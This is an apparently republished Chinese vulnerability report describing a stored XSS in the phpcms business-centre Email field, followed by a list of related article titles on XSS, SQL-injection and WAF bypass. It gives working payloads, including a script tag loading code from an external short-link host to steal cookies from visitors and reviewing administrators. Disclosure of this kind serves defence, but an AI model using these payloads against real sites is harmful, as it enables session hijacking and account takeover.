phpcms某处储存型XSS(demo+本地演示)
来源:互联网 发布:程序员密码 编辑:程序博客网 时间:2024/05/22 03:31
详细说明:
demo+本地演示
存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的
然后点击提交可以看到说操作成功
然后来到我们的企业首页查看可以看到成功弹窗
再查看下源代码,可以看到是储存型的
本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的,但是管理员审核会员的时候会到会员的企业查看,这个时候可以看到成功弹窗
然后继续构造:"/><script src=http://t.cn/Rz4Oi2b></script>,提交后看看能不能打cookie
可以看到已经成功打到cookie~
漏洞证明:
修复方案:
0 0
- phpcms某处储存型XSS(demo+本地演示)
- 反射型xss实战演示
- 反射型xss实战演示
- 记一次挖掘115网盘反射型xss,08xss的储存型xss
- 云来储存型XSS漏洞+越权修改应用封面
- 反射型xss偷取cookie(本地验证)
- phpcms v9 本地安装(upupw)
- XSS漏洞演示
- XSS网站攻击演示
- oracle 储存过程demo
- HTML5 localStorage本地储存
- SBT使用本地储存
- 本地储存NSUserDefaults
- 本地线程储存
- 本地线程储存
- unity PlayerPrefs本地储存
- HTML5本地储存
- 理论:本地储存
- Xcode 调试与快捷键
- hdu 3364(异或方程的高斯消元)
- XMPP介绍三:Socket
- 3、 CAS单点登录源码解析之【单点登出】
- 4、CAS单点登录源码解析之【用户认证】
- phpcms某处储存型XSS(demo+本地演示)
- hdu1128 Self Numbers
- windows2003 iis6配置文件和win2008/2012 iis7.5配置文件
- ecshop hash登录 + wordpress mysql盲注字段
- SQLmap简介以及防火墙绕过方法
- 360网站卫士SQL注入绕过案例一个
- 绕过安全狗等一些WAF收集
- 利用kali嗅探周围发送的短信
- 【转载】Kali-linux安装之后的简单设置